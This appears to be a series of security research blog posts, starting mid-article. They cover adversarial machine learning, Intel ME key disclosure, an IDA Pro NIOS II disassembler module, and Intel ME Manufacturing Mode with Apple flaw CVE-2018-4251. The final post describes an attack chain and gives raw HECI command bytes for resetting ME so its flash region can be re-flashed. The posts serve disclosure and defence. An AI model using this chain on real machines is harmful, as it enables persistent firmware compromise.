Our main tip is: do not use machine learning models in adversarial settings if possible. You're in the clear to use machine learning if your task is to classify pictures or generate memes. Even if a deliberate attack is successful, the societal or economic consequences are minimal. However, if your system performs important functions—say, diagnosing diseases, detecting attacks against industrial facilities, or controlling a self-driving car—the risks of compromise may be disastrous.

Recalling our simplified description of what classification is—creating a hyperplane that would divide space into classes—we can observe a contradiction. Let's review this situation in two-dimensional space.

On the one hand, we are trying to find the function that divides the two classes with maximum accuracy. On the other hand, we cannot form a perfectly accurate boundary because we generally do not have the entire population. Our task is to find the function that minimizes classification mistakes. To summarize, we want to form an accurate boundary while avoiding overfitting (hewing too closely to the known data), so that the model can still predict the behavior of unknown data.


1—underfitting; 2—overfitting; 3—optimal

The way to avoid underfitting is clear: increase the training dataset by any means possible. Overfitting can be combated with effective regularization methods. These methods make a model more robust to small outliers, but not to adversarial examples.

Incorrect classification of adversarial examples is an obvious problem. If a model has not seen such examples among its training data, it will probably make errors. This issue can be solved by adding adversarial examples to the training dataset, at least to avoid those particular errors. Still, it seems improbable that we can generate all possible adversarial examples and have 100 percent accuracy, because of needing to find a compromise between overfitting and underfitting.

One more tool is a generative adversarial network (GAN), which consists of two neural networks—generative and discriminative. The discriminative model aims to distinguish between fake and real data, and the generative model learns to generate data that can fool the discriminative model. A compromise between sufficient classification quality of the discriminator and the time spent on learning can produce a model that is robust to adversarial examples.

But despite these methods, it is still possible to create a dataset that will lead the model to a wrong solution.

What are the potential implications of machine learning for information security?


Debates about who should bear responsibility for errors made by machine learning models, as well as their social consequences, have gone on for a long time. Creation and use of such systems involves several stakeholders, including algorithm developers, data providers, and system users (that is to say, the owners).

At first glance, the developer would seem to have a great impact on the result—from selecting an algorithm to setting parameters and performing testing. But in reality, the developer makes a software product that is supposed to meet certain requirements. As soon as the model complies with these requirements, the developer's work is done and the model moves into the operational stage, probably revealing some bugs in the process.

On the one hand, this happens because developers cannot know the whole population of data at the training stage. But on the other hand, this can be an artifact of real-life data. A very vivid example is the Twitter chatbot created by Microsoft that learned from real data and then started to write racist tweets.

Was such behavior a bug or a feature? The algorithm used real data for learning and started to imitate it. That might seem to be a marvelous achievement by the developers, in a technical sense. But the data was what it was, so from an ethical point of view, this bot turned out to be unusable—because it learned so well to do what everyone wanted it to do.

Perhaps Elon Musk was right after all to claim that "artificial intelligence is our biggest existential threat"?

Positive Technologies researcher finds vulnerability enabling disclosure of Intel ME encryption keys

Image credit: Unsplash
Intel has issued a patch in response to a serious vulnerability in Intel ME firmware discovered by Positive Technologies expert Dmitry Sklyarov. The vulnerability involved security mechanisms in the MFS file system, which Intel ME uses to store data. By exploiting this flaw, attackers could manipulate the state of MFS and extract important secrets.

Intel ME (short for "Management Engine") stores data with the help of MFS (which likely stands for "ME File System"). MFS security mechanisms make heavy use of cryptographic keys. Keys differ in purpose (confidentiality vs. integrity) and degree of data sensitivity (Intel vs. non-Intel). The most sensitive data is protected by Intel Keys, with Non-Intel Keys used for everything else. So in total, four keys are used: Intel Integrity Key, Non-Intel Integrity Key, Intel Confidentiality Key, and Non-Intel Confidentiality Key.

In 2017, Positive Technologies experts Mark Ermolov and Maxim Goryachy uncovered a vulnerability that could be exploited to obtain all four keys, thus completely compromising MFS security mechanisms.

Intel later issued an update addressing this vulnerability. By increasing the Security Version Number (SVN), Intel updated all keys to make MFS security work as intended. It should now have been impossible to obtain the MFS keys for updated ME firmware versions (those with the new SVN value).

But in 2018, Positive Technologies expert Dmitry Sklyarov discovered vulnerability CVE-2018-3655, described in advisory Intel-SA-00125. He found that Non-Intel Keys are derived from two values: the SVN and the immutable non-Intel root secret, which is unique to each platform. By using an earlier vulnerability to enable the JTAG debugger, it was possible to obtain the latter value. Knowing the immutable root secret enables calculating the values of both Non-Intel Keys even in the newer firmware version.

Attackers could calculate the Non-Intel Integrity Key and Non-Intel Confidentiality Key for firmware that has the updated SVN value, and therefore compromise the MFS security mechanisms that rely on these keys.

The Non-Intel Integrity Key enforces the integrity of all MFS directories. Knowledge of this key could be abused to add files, delete files, and change their protection attributes. This key also underlies anti-replay tables, which are intended to prevent substitution of the contents of some files with previous versions. Anti-replay mechanisms could be easily bypassed as a result. The Non-Intel Confidentiality Key secures certain files and is used to encrypt the AMT password, for example.

By sequentially exploiting the vulnerabilities discovered by Positive Technologies in 2017 and 2018, an attacker could take advantage of ME to obtain vital secrets. Although the need for physical access makes exploitation more difficult, the scope of the threat remains breathtaking.

Positive Technologies experts have found a number of vulnerabilities in Intel ME. Mark Ermolov and Maxim Goryachy gave a talk at Black Hat Europe regarding a vulnerability they discovered. At the same conference, Dmitry Sklyarov delved into the workings of the ME file system.

In addition, Positive Technologies experts devised a method for disabling Intel ME by using an undocumented mode and showed how to enable JTAG debugging.

How we developed the NIOS II processor module for IDA Pro

IDA Pro UI

IDA Pro has a well-earned place in the toolkit of security researchers worldwide. We at Positive Technologies are no exception. In fact, we like it so much that we developed a disassembler processor module for the NIOS II architecture to make analyzing code faster and more convenient.

Here I will give a brief history of the project and share what exactly it is that we created.

Beginnings


It all started in 2016, when we had to develop a processor module in-house to analyze firmware for some work we were doing. Development started from scratch based on the Nios II Classic Processor Reference Guide, which was the most up-to-date reference at the time. This took about two weeks.

The processor module was developed for IDA version 6.9. IDA Python was the logical choice for the sake of speed. The procs subfolder inside the IDA Pro installation folder, where processor modules are stored, contains three Python modules: msp430, ebc, and spu. These modules served as examples of module structure and of how to implement basic functionality:

  • Parsing instructions and operands
  • Simplifying instructions and displaying them
  • Creating offsets, cross-references, and the code and data to which they refer
  • Handling switch constructions
  • Handling manipulations with the stack and stack variables

This is the functionality I was able to implement at that time, more or less. Fortunately, these labors came in handy again during a different project a year later, during which I actively used and improved the module.
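
For orientation, the overall shape of such a module is roughly as follows. This is a heavily abridged sketch against the IDA 7.x Python API; the instruction, register, and assembler tables that a real module must define are elided, and the bundled msp430, ebc, and spu modules remain the best reference:

import ida_idp

class nios2_processor_t(ida_idp.processor_t):
    id = 0x8000 + 1            # custom processor IDs must be >= 0x8000
    flag = ida_idp.PR_USE32 | ida_idp.PRN_HEX
    cnbits = dnbits = 8        # bits per byte in code and data
    psnames = ["nios2"]        # short name shown in the processor list
    plnames = ["Altera NIOS II"]
    segreg_size = 0
    # ...plus instruc, instruc_start/instruc_end, reg_names, assembler...

    def ev_ana_insn(self, insn):
        # decode 4 bytes at insn.ea: set insn.itype and the operands,
        # return the instruction size (4) on success, 0 on failure
        ...

    def ev_emu_insn(self, insn):
        # create code/data cross-references, offsets, stack variables
        ...

    def ev_out_insn(self, ctx):
        # render the mnemonic and operands
        ...

def PROCESSOR_ENTRY():
    return nios2_processor_t()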

I decided to share this experience creating a processor module with the community at PHDays 8. The talk drew interest (a video is available on the PHDays site) and even Ilfak Guilfanov, the creator of IDA Pro, was in attendance. One of his questions was: is IDA Pro version 7 supported? The answer then was "no" but after the talk, I committed to releasing a module version that would. And that's when things got interesting.

Now there was a newer manual from Intel, which helped to make comparisons and check for bugs. I made big changes to the module, added numerous new features, and fixed some problems that had previously eluded solution. And of course, I added support for version 7 of IDA Pro. This is the result.

NIOS II programming model


NIOS II is an embedded processor developed for FPGAs from Altera (now a part of Intel). From a software standpoint, it has the following notable features: Little Endian byte order, 32-bit address space, 32-bit instruction set (meaning a fixed command length of 4 bytes), and 32 general-purpose registers and 32 special-purpose registers.

Disassembly and code references


So we open a new file with firmware for the NIOS II processor in IDA Pro. After installing the module, we see it in the list of IDA Pro processors, shown in the following screenshot:


Suppose the module does not yet support even basic parsing of commands. Since each command occupies 4 bytes, we group the bytes in fours, which resembles the following:


After we implement basic functionality to decode the instructions and operands, display them on screen, and analyze execution transfer instructions, the set of bytes from our above example turns into the following code:


As the example shows, cross-references with execution transfer commands are formed as well (in this particular case, we see a conditional jump and procedure call).

One useful thing we can implement in processor modules is comments for commands. If we disable display of byte values and enable comments instead, the same code will look as follows:



So if you are dealing with assembler code on an architecture that is new to you, comments can help you to get a feel for what is going on. The remaining code examples here will be given in the same way, with comments, so that you can concentrate on what is happening in the code instead of flipping through the NIOS II manual.

Pseudoinstructions and simplifying commands


Some NIOS II commands are pseudoinstructions. These commands do not have separate opcodes, and they themselves are modeled as special cases of other commands. During disassembly, instructions are simplified: in other words, certain combinations are replaced with pseudoinstructions. There are four types of NIOS II pseudoinstructions:


  • When the zero register (r0) is one of the sources and can be disregarded 
  • When a command has a negative value and the command is replaced with the opposite one
  • When a condition is replaced with the opposite one
  • When a 32-bit offset is moved in two commands (high and low halfword) and this is replaced with a single command


The first two types have been implemented. Replacing the condition does not change much, and 32-bit offsets turned out to be more diverse than the manual describes.

Let's see an example of the first type.



In our example, the zero register is used frequently in calculations. If we look closely, all the commands (other than execution transfer commands) simply move values into particular registers.

After pseudoinstruction handling is applied, we get more readable code: instead of the OR and ADD commands, we now see MOV.
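
Inside the module, this boils down to a rewrite rule applied right after decoding. A simplified sketch with illustrative field names (the real module works with IDA's insn_t operands):

R_ZERO = 0  # register r0 always reads as zero on NIOS II

def simplify(insn):
    """Rewrite 'add rC, rA, r0' or 'or rC, rA, r0' as 'mov rC, rA'."""
    if insn.mnem in ("add", "or") and insn.src2 == R_ZERO:
        insn.mnem = "mov"
        insn.operands = [insn.dst, insn.src1]   # the zero source disappears
    return insn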


Stack variables


NIOS II has stack support, and besides the stack pointer (sp) it also has a stack frame pointer (fp). Here is an example of a short procedure with use of a stack:


Space on the stack is reserved for local variables. Presumably, the ra register is saved in, and then restored from, a stack variable.

After we have added functionality to the module for monitoring stack pointer changes and creating stack variables, this is how the sample will look:


The code is easier to understand now: we can name stack variables and study their purpose through cross-references. The function in our example is a __fastcall; its arguments, passed in the r4 and r5 registers, are moved to the stack to call a subprocedure of the _stdcall type.

32-bit numbers and offsets


In a single operation (one command), NIOS II can move a value of at most 2 bytes (16 bits) into a register. The processor registers and address space, however, are 32-bit, meaning that 4 bytes are needed for addressing.

To overcome this, it is necessary to use offsets consisting of two parts. A similar mechanism is used on PowerPC processors: an offset consists of a high and low part and is moved to the register in two commands. This is how it works on PowerPC:


Cross-references are formed from both commands, although effectively it is the second command that sets the address. This can be inconvenient when trying to count the number of cross-references.

The non-standard type HIGHA16 is used in the properties of the offset for the high part, and sometimes the HIGH16 type is used; LOW16 is used for the low part.


Actually calculating 32-bit numbers from the two parts is not at all difficult. What is difficult is generating the operands as offsets for two separate commands. All of this processing is the job of the processor module, and the IDA SDK contained no existing examples of how to do it (and certainly none written in Python).

In the PHDays talk, I mentioned offsets as an unresolved task. To solve this, we had to be clever: the 32-bit offset is taken only from the low halfword, relative to the base. The base is calculated as the high halfword shifted 16 bits to the left.


With this approach, a cross-reference is generated only for the command responsible for moving the low halfword of the 32-bit offset.

In the offset properties, we can see the base and property for treating the base address as a plain number, to avoid generating a large number of cross-references to the very same address that is serving as the base.


NIOS II code moves a 32-bit number into a register as follows: first, the high halfword is moved with the movhi command; then the low halfword is joined to it. The latter can be accomplished with three different commands: addition (addi), subtraction (subi), or logical OR (ori).
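
The arithmetic for combining the two halves is the easy part. A sketch covering the three variants, where the inputs are the 16-bit immediates taken from the paired instructions (treating the addi immediate as sign-extended is our reading of the instruction set):

def combine32(high16, low16, op):
    """Rebuild the 32-bit value set by a movhi + addi/subi/ori pair."""
    base = (high16 << 16) & 0xFFFFFFFF
    if op == "ori":                    # plain bitwise OR of the low half
        return base | low16
    if op == "addi":                   # sign-extended 16-bit immediate
        signed = low16 - 0x10000 if low16 & 0x8000 else low16
        return (base + signed) & 0xFFFFFFFF
    if op == "subi":
        return (base - low16) & 0xFFFFFFFF
    raise ValueError(op)

assert combine32(0x0001, 0x2345, "ori") == 0x00012345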

For example, in the following code, 32-bit numbers are moved into registers (arguments prior to a function call):


After we have added offset calculations, we get the following representation of the code:



The resulting 32-bit offset is displayed next to the command for moving its low halfword. This example is rather striking and we could even mentally sum up all the 32-bit numbers with ease, simply by combining the high and low parts. Judging by the values, they are unlikely to be offsets.

Now we will look at a case when subtraction is used for moving a low halfword. Here we can no longer calculate the final 32-bit values (offsets) without effort.


After applying calculation of 32-bit numbers, it looks as follows:


Here we see that if an address is contained in the address space, an offset for it is generated, and the value formed by combining the high and low halfwords is no longer displayed next to it. Here we obtained the offset for the string "10/22/08". To make the final offsets point to valid addresses, we will increase the segment size slightly.


After enlarging the segment, we see that now all the calculated 32-bit numbers are offsets and point to valid addresses.

Earlier, I mentioned that we can also use the logical OR command to calculate offsets. The following code uses this approach to calculate two offsets:


The calculations from register r8 are then placed in the stack.

After conversion, we see that the registers are set to the start addresses of procedures: the procedure address is moved to the stack.


Reading and writing relative to base


So far, the 32-bit number being moved in two commands has been either a number or offset. In the next example, a base is moved to the high halfword of the register and then reading or writing is performed relative to it.


In this case, we get offsets for variables from the read and write commands themselves. Depending on the size of the operation, the size of the variable may be set as well.


Switch constructions


The switch constructions found in binary files can simplify analysis. For example, based on the number of cases inside a switch construction, we can locate the switch responsible for handling a particular protocol or command system. This is why we want to recognize a switch and its parameters. Take the following code:


Execution stops at the register jump jmp r2. It is followed by code referenced from data, and the end of each block of code contains a jump to the same label. Thus we can see that this is a switch construction, and that these blocks handle particular cases within it. Above, we also see verification of the number of cases and a default jump.

After we add switch handling, the code looks as follows:



Now we clearly make out the jump, address of the table with offsets, number of cases, and each case with corresponding number.

The table with offsets is as follows (to save space, only the first five elements are listed):


In essence, switch handling involves walking through the code (starting from the tail end) and finding all of its components; effectively, a particular switch organization scheme is described inside the module. But real-life schemes can contain exceptions. This is one reason why existing processor modules can fail to recognize seemingly obvious switches: the real-life switch simply doesn't fit the scheme defined inside the processor module. Or a scheme exists, but unrelated commands appear within it, the main commands have traded places, or the scheme is interrupted by jumps.

The NIOS II processor module recognizes a switch despite the presence of unrelated instructions between its main commands, as well as a switch whose main commands have swapped places or one containing disruptive jumps. It uses a reverse execution path approach that takes into account possible scheme-disrupting jumps, setting internal variables that signal the various states of the recognizer. In total, the module handles approximately 10 different ways of organizing a switch, as found in various firmware.
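To give an idea of the approach, here is a toy model of recognizing just one (hypothetical) scheme: scan backwards from the register jump, tolerating unrelated instructions, until both the table load and the bounds check are found. The real module is considerably more involved.

#include <cstdint>
#include <string>
#include <vector>

// Simplified instruction model: "ldw" loads the jump register from the offset
// table, "bgeu" is the case-count check with the default jump.
struct Insn { std::string mnem; int dst; uint32_t imm; };

struct SwitchInfo { size_t table_load; size_t bound_check; uint32_t ncases; };

bool recognize_switch(const std::vector<Insn> &code, size_t jmp_idx, SwitchInfo *si)
{
    if (code[jmp_idx].mnem != "jmp")
        return false;

    bool have_load = false, have_bound = false;
    for (size_t i = jmp_idx; i-- > 0 && !(have_load && have_bound); )
    {
        if (!have_load && code[i].mnem == "ldw" && code[i].dst == code[jmp_idx].dst)
        {
            si->table_load = i;          // jump register loaded from the table
            have_load = true;
        }
        else if (!have_bound && code[i].mnem == "bgeu")
        {
            si->bound_check = i;         // number of cases plus default jump
            si->ncases = code[i].imm;
            have_bound = true;
        }
        // anything else is an unrelated instruction: just step over it
    }
    return have_load && have_bound;
}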

The custom instruction


The NIOS II has an interesting instruction by the name of custom. This instruction gives access to the 256 user-defined instructions supported by the NIOS II. In addition to general-purpose registers, the custom instruction can access a special set of 32 custom registers. After implementing logic for parsing the custom instruction, here is what we see:



Note that the two final instructions have the same instruction number and seem to perform the same actions.
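The duplicate numbers are easy to explain once the encoding is laid out. Here is a decoding sketch based on my reading of the Nios II R-type layout (treat the exact field positions as assumptions): the 8-bit field N selects one of the 256 user instructions, and the readra/readrb/readrc bits choose between general-purpose and custom registers.

#include <cstdint>

struct CustomInsn {
    uint8_t a, b, c;                 // register indexes
    bool readra, readrb, readrc;     // GPR (true) vs. custom register (false)
    uint8_t n;                       // user instruction number, 0..255
};

bool decode_custom(uint32_t w, CustomInsn *out)
{
    if ((w & 0x3F) != 0x32)          // low 6 bits: the "custom" opcode
        return false;
    out->n      = (w >> 6) & 0xFF;
    out->readrc = (w >> 14) & 1;
    out->readrb = (w >> 15) & 1;
    out->readra = (w >> 16) & 1;
    out->c      = (w >> 17) & 0x1F;
    out->b      = (w >> 22) & 0x1F;
    out->a      = (w >> 27) & 0x1F;
    return true;
}

Two encodings with the same N but different register fields decode to the same user operation applied to different operands, which is what we observe above.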

The custom instruction is the subject of a separate manual. According to the manual, one of the most complete and modern custom instruction sets is the NIOS II Floating Point Hardware 2 Component (FPH2) set of instructions for floating-point computations. This is how our example looks after implementing FPH2 command parsing:


Based on the mnemonic of the two last commands, we indeed see that they perform the same action (the fadds command).

Jumping by register value


In firmware, we often see situations when a 32-bit offset (setting the jump location) is moved to a register and a jump is performed based on the register value.

Have a look at the code:


In the last line, there is a jump by register value. Before it, the address of the procedure (the one starting in the first line of the example) is moved to the register. The jump is clearly to the beginning of the procedure.

This is the result after adding functionality for jump recognition:


Next to the jmp r8 command is the address to which the jump is being made, if we were able to determine it. A cross-reference is also generated between the command and the address of the jump destination. The cross-reference is visible in the first line, while the jump itself occurs in the final line.

gp (global pointer) values: saving and loading


It is common to use a global pointer set to an address and then address variables relative to that pointer. In NIOS II, the gp register is used to store the global pointer. At a certain moment (most often during the firmware initialization procedures), an address value is moved to the gp register. The processor module handles this situation. To illustrate this, we have given examples of code and output from IDA Pro with debug messages enabled for the processor module.

In this case, the processor module finds and calculates the value of the gp register in the newly created database. When the idb database is closed, the value of gp is saved in it.


When an existing idb database is loaded and the value of gp has already been found, the value is loaded from the database, as shown in the debug message in the following example:

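Under the hood, such persistence can be organized with a netnode, since netnodes are stored inside the idb. A hedged sketch (the netnode name and index here are illustrative, not the module's actual ones):

#include <ida.hpp>
#include <netnode.hpp>

static netnode gp_node;

// called once the gp value has been found
void save_gp(ea_t gp_value)
{
    gp_node.create("$ nios2 gp");        // netnodes live inside the idb
    gp_node.altset(0, gp_value);
}

// called when an existing idb is loaded
ea_t load_gp(void)
{
    if (!gp_node.create("$ nios2 gp"))   // false: the node already exists
        return (ea_t)gp_node.altval(0);
    return BADADDR;                      // nothing saved yet
}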

Reading and writing relative to gp


Reading and writing with an offset relative to gp is a common occurrence. The following example includes three reads and one write of this type:


Since we have already obtained the address value stored in the gp register, we can resolve these reads and writes to addresses.

Handling of gp-relative reading and writing makes things more convenient for us.


We can see which variables are being accessed, track their use, and determine their purpose.

Addressing relative to gp


The gp register can also be used for addressing variables.


For example, here we see that registers are set relative to gp to certain variables or data regions:

Once we drop in functionality to handle this situation by converting to offsets and adding cross-references, here is the result:


Now it is clear what is happening and we can identify the regions to which registers are being set relative to gp.

Addressing relative to sp


Similarly, registers in the next examples are set to certain memory regions, but this time relative to the stack pointer (sp).


As is visible, the registers are set to certain local variables. Such situations, when arguments are set to local buffers before procedure calls, are fairly common.

After adding handling for these situations (by converting the values to offsets), we obtain the following:


Now it is clear that after the procedure call, the values are loaded from the variables whose addresses were passed in parameters prior to the function call.

Cross-references from code to structure fields

Setting and using structures in IDA Pro can make code analysis more efficient.


We can see from the code that the field_8 field is incremented and is perhaps used as a counter for triggering an event. If the reads and writes of a field are far away from each other in the code, cross-references can be useful.

Let's look at the structure:


Structure fields are accessed, but cross-references from the code to the structure elements have not been formed.

After these situations are handled, this is how it will all look in our case:


Now there are cross-references to structure fields from the specific commands involving those fields. Both forward and back cross-references are present. Based on them, we can see in which procedures the field values are read or written.

Where the manual and reality diverge


According to the manual, during decoding of some commands, certain bits are supposed to take only strictly defined values. For example, for the eret command for returning from an exception, bits 22–26 should equal 0x1E.


Here is a command example from firmware:


When we open a different firmware image at a place with similar context, something different happens:


These bytes were not automatically converted to a command, although all the commands are handled. Judging by the context (and even the similar address), this should be the same command. But take a close look at the bytes: this is the eret command, except that bits 22–26 equal zero instead of 0x1E.

So we have to slightly tweak the parsing of this command: although it no longer corresponds exactly to the manual, it does match reality.
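One way to express such a tweak is to keep two match patterns: the strict one from the manual and a relaxed one with the troublesome bits masked out. A sketch (the concrete mask/value constants for eret are deliberately left symbolic, since they depend on the exact encoding):

#include <cstdint>

struct Pattern { uint32_t mask, value; };

bool matches(uint32_t word, Pattern p)
{
    return (word & p.mask) == p.value;
}

// Relaxed pattern: drop bits 22-26 from the mask, so both the documented
// encoding (0x1E in bits 22-26) and the real-life one (zeros) decode as eret.
Pattern relax_bits_22_26(Pattern strict)
{
    strict.mask &= ~(0x1Fu << 22);
    return strict;
}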


IDA 7 support


The API provided by IDA Python for ordinary scripts has changed considerably as of IDA version 7.0. For processor modules, the changes are massive. Nonetheless, we succeeded in reworking the NIOS II processor module for version 7.


There is one strange thing: when a new binary file for NIOS II is loaded in IDA 7, analysis does not start automatically, unlike in IDA 6.9.

Conclusion


The SDK contains examples in which a processor module, besides having basic disassembler functionality, supports numerous features that make it easier to pick apart code. Certainly this all could be done by hand, but say that you have a binary file with megabytes of firmware containing tens of thousands of offsets of various types—why waste so much time if there is a more efficient way? A well-implemented processor module can perform this task instead. And cruising through code with the help of cross-references can be downright fun! With these abilities, IDA remains the convenient and helpful tool beloved by so many.

Author: Anton Dorfman, Positive Technologies

Intel ME Manufacturing Mode: obscured dangers and their relationship to Apple MacBook vulnerability CVE-2018-4251


The weakness of "security through obscurity" is so well known as to be obvious. Yet major hardware manufacturers, citing the need to protect intellectual property, often require a non-disclosure agreement (NDA) before allowing access to technical documentation. The situation has become even more difficult with the growing intricacy of chip designs and integration of proprietary firmware. Such obstacles make it nearly impossible for independent researchers to analyze the security of these platforms. As a result, both ordinary users and hardware manufacturers lose out.

One example is Intel Management Engine (Intel ME), including its server (Intel SPS) and mobile (Intel TXE) versions (for background on Intel ME, we recommend consulting  [5] and [6]). In this article, we will describe how undocumented commands (although "undocumented" applies to practically everything about Intel ME) enable overwriting SPI flash memory and implementing the doomsday scenario: local exploitation of an ME vulnerability (INTEL-SA-00086). At the root of this problem is an undocumented Intel ME mode, specifically, Manufacturing Mode.

What is Manufacturing Mode?

Intel ME Manufacturing Mode is intended for configuration and testing of the end platform during manufacturing, and as such should be disabled (closed) before sale and shipment to users. However, this mode and its potential risks are not described anywhere in Intel's public documentation. Ordinary users do not have the ability to disable this mode, since the relevant utility (part of Intel ME System Tools) is not officially available. As a result, there is no software that can protect, or even notify, the user if this mode is enabled for whatever reason. Even Chipsec [2], a utility specially designed to identify configuration errors in the chipset and CPU at the level of UEFI firmware (such as incorrect configuration of access rights for SPI flash regions), does not know anything about Intel Manufacturing Mode.

This mode allows configuring critical platform settings stored in one-time-programmable memory (FUSEs). These settings include those for BootGuard (the mode, policy, and hash for the digital signing key for the ACM and UEFI modules). Some of them are referred to as FPFs (Field Programmable Fuses). For a list of FPFs that can be written to FUSEs (a list that is incomplete, since a number of FPFs cannot be set directly), you can use the FPT (Flash Programming Tool) utility from Intel ME System Tools.

Figure 1. Output of the -FPFs option in FPT
FPFs account for only part of the FUSE array: most of it is used by Intel to store platform parameters. Part of this space, called IP FUSEs, stores the settings of IP (intellectual property, i.e., hardware logic block) units. For example, the DFx Aggregator special device stores in FUSEs a flag indicating whether the platform is for testing or mass production.

In addition to FPFs, in Manufacturing Mode the hardware manufacturer can specify settings for Intel ME, which are stored in the Intel ME internal file system (MFS) on SPI flash memory. These parameters can be changed by reprogramming the SPI flash. The parameters are known as CVARs (Configurable NVARs, Named Variables).

Setting CVARs is the responsibility of the Intel ME module named mca_server. MCA is short for "Manufacture-Line Configuration Architecture," which is the general name for the process of configuring the platform during manufacturing. CVARs, just like FPFs, can be set and read via FPT.

Figure 2. List of CVARs output by FPT for the Broxton P platform
The list of CVARs depends on the platform and version of Intel ME. For chipsets supporting Intel AMT, one of the CVARs is the password for entering MEBx (ME BIOS Extension).

Setting FPFs, or almost any CVARs, requires that Intel ME be in Manufacturing Mode. The process of assigning FPFs consists of two steps: setting the values for FPFs (which are saved to temporary memory) and committing the FPF values to the FUSEs. The first step is possible only in Manufacturing Mode, but the actual "burn" occurs automatically after Manufacturing Mode is closed if, while in that mode, the manufacturer set FPF values and the corresponding range in the FUSE array has never been written to before. So, if a system is in Manufacturing Mode, the FPFs have likely never been initialized.

A flag indicating that Manufacturing Mode has been closed is stored in the file /home/mca/eom on MFS. When the SPI flash is overwritten with firmware containing the basic file system (as it is just after being built by FIT [9]), the platform can once again function in Manufacturing Mode, although overwriting FUSEs is no longer possible.

OEM public key

Accordingly, the procedure for configuring Intel platforms is rather complicated and consists of multiple steps. Any error or deviation from this procedure by hardware manufacturers places the platform at serious risk. Even if Manufacturing Mode has been closed, a manufacturer may not have set the FPFs, which allows attackers to do so themselves, writing their own values (for example, their own key instead of the key for signing the start code of the BootGuard ACM and UEFI modules). In this case, the platform would only ever load the attacker's malicious code, and persistently so. This would lead to irreversible hardware compromise, since the attacker's key is written to permanent memory, from which it can never be removed (for details of this attack, see "Safeguarding rootkits: Intel BootGuard" by Alexander Ermolov [8]).

On newer systems (Apollo Lake, Gemini Lake, Cannon Point), FPFs store not just the BootGuard key, but the OEM's public key (strictly speaking, the SHA256 hash of the RSA OEM public key), which underpins several ME security mechanisms. For example, the special section of SPI flash named Signed Master Image Profile (SMIP) stores manufacturer-specified PCH Straps (the PCH hardware configuration). This section is signed with a key whose SHA256 hash is stored in a special file (partition) on SPI flash. The file is named oem.key in the FTPR partition (OEMP.man in the OEMP partition for the Cannon Point PCH) and contains various OEM-provided public keys used for signing all sorts of data. In the following figure, you can see the full list of the data sets signed by the manufacturer, each with a unique key, for the Cannon Point platform:

Figure 3. List of OEM-signed data for the CNP platform
The oem.key file itself is signed with an OEM root key, whose public key’s hash should be written in the FPFs.

Figure 4. OEM signing
Therefore, having compromised the OEM root key, an attacker can compromise all previously mentioned data, which is much worse than the Boot Guard–only takeover possible on older platforms.

Bypassing block on writing to the ME region

Until recently (prior to Intel Apollo Lake), Intel ME was located in a separate SPI region that had independent access rights for the CPU, GBE, and ME. So as long as access attributes were correctly configured, it was impossible to read or write to ME from the CPU (main system) side. However, current SPI controllers for Intel chipsets have a special mechanism called Master Grant. This mechanism assigns a strictly defined portion of SPI flash to each SPI master. A master controls its particular region, regardless of the access rights indicated in the SPI descriptor. Each master can provide access (read or write) for its region (but only its own region!) to any other master it wishes.

Figure 5. Excerpt from Intel documentation describing SPI Master Grant
What this means is that even if the SPI descriptor forbids host access to an SPI region of ME, it is possible for ME to still provide access. In our view, this change was likely intended to enable updating Intel ME in a way that bypasses the standard process.

Host ME Region Flash Protection Override

Intel ME implements a special HECI command that allows opening write access to the ME SPI region from the CPU side. The command is called HMRFPO (Host ME Region Flash Protection Override). We have described this command at length previously [5]. There are some things worth knowing about it.

After receiving the HMRFPO command, Intel ME opens access to the region only after a reset. Intel ME itself also includes security measures: the command is accepted only while the UEFI BIOS owns the platform boot process, that is, prior to End Of Post (EOP). EOP is a different HECI command, which the UEFI sends to ME before handing off control to the operating system (ExitBootServices). Sometimes BIOS Setup contains an option for sending the HMRFPO command prior to EOP.

Figure 6. Opening the ME region in the BIOS
After receiving EOP, Intel ME ignores HMRFPO and returns the corresponding error status. But this is the case only after Manufacturing Mode has been closed: in Manufacturing Mode, Intel ME accepts HMRFPO at any time, regardless of the presence (or absence) of End Of Post. So if the manufacturer has failed to close Manufacturing Mode, an attacker can alter Intel ME at any time (administrator rights are needed, of course, but even the OS kernel normally cannot re-flash Intel ME). At this stage, the attacker can re-flash the ME image, for example to exploit vulnerability INTEL-SA-00086. A reset is then needed to run the modified firmware, which is no problem on nearly any platform, with the exception of Apple MacBooks. Apple computers contain an additional check in the UEFI, which runs at UEFI launch and blocks startup of the system if the ME region has been opened with HMRFPO. However, as we will show here, this mechanism can be easily bypassed if Intel ME is in Manufacturing Mode.

Resetting ME without resetting the main CPU

Today's computers can be restarted in several different ways; the documented ones include a global reset and a reset of the main CPU only (without resetting ME). But if there were a way to reset ME without resetting the main CPU (having run the HMRFPO command in advance), access to the region would open up while the main system continues to function.

Figure 7. Reset types

Having investigated the internal ME modules, we discovered that there is a HECI command ("80 06 00 07 00 00 0b 00 00 00 03 00", see more about sending commands in [5]) for a reset of only (!!!) Intel ME. In Manufacturing Mode, this command can be sent at any time, even after EOP:

Figure 8. Disassembler listing for the function responsible for handling HECI ME reset commands
Therefore, an attacker who sends these two HECI commands opens the ME region and can write arbitrary data there, without having to reset the platform as a whole. And it doesn't even matter what the SPI descriptor contains—correctly set protection attributes for SPI regions will not protect ME from modifications if the system is running in Manufacturing Mode.

Exploitation case: vulnerability CVE-2018-4251

We analyzed several platforms from a number of manufacturers, including Lenovo laptops and Apple MacBook Pro laptops. The Yoga and ThinkPad computers we examined did NOT have any issues related to Manufacturing Mode. But we found that Apple laptops on Intel chipsets run in Manufacturing Mode. After this information was reported to Apple, the vulnerability (CVE-2018-4251) was patched in macOS High Sierra update 10.13.5.

Local exploitation of INTEL-SA-00086

By exploiting CVE-2018-4251, an attacker could write old versions of Intel ME (such as versions containing vulnerability INTEL-SA-00086) to memory without needing an SPI programmer or access to the HDA_SDO bridge—in other words, without physical access to the computer. Thus, a local vector is possible for exploitation of INTEL-SA-00086, which enables running arbitrary code in ME.
Notably, in the notes for the INTEL-SA-00086 security bulletin, Intel does not mention enabled Manufacturing Mode as a method for local exploitation in the absence of physical access. Instead, the company incorrectly claims that local exploitation is possible only if access settings for SPI regions have been misconfigured. So to keep users safe, we decided to describe how to check the status of Manufacturing Mode and how to disable it.

What can users do?

Intel ME System Tools includes the MEInfo utility (and, for mobile and server platforms respectively, TXEInfo and SPSInfo), intended for obtaining thorough diagnostic information about the current state of ME and the platform overall. We demonstrated this utility in our previous research about the undocumented HAP (High Assurance Platform) mode and how to disable ME [6]. When called with the -FWSTS flag, the utility displays a detailed description of the HECI status registers and the current status of Manufacturing Mode (when the fourth bit of the FWSTS status register is set, Manufacturing Mode is active).

Figure 9. Example of MEInfo output
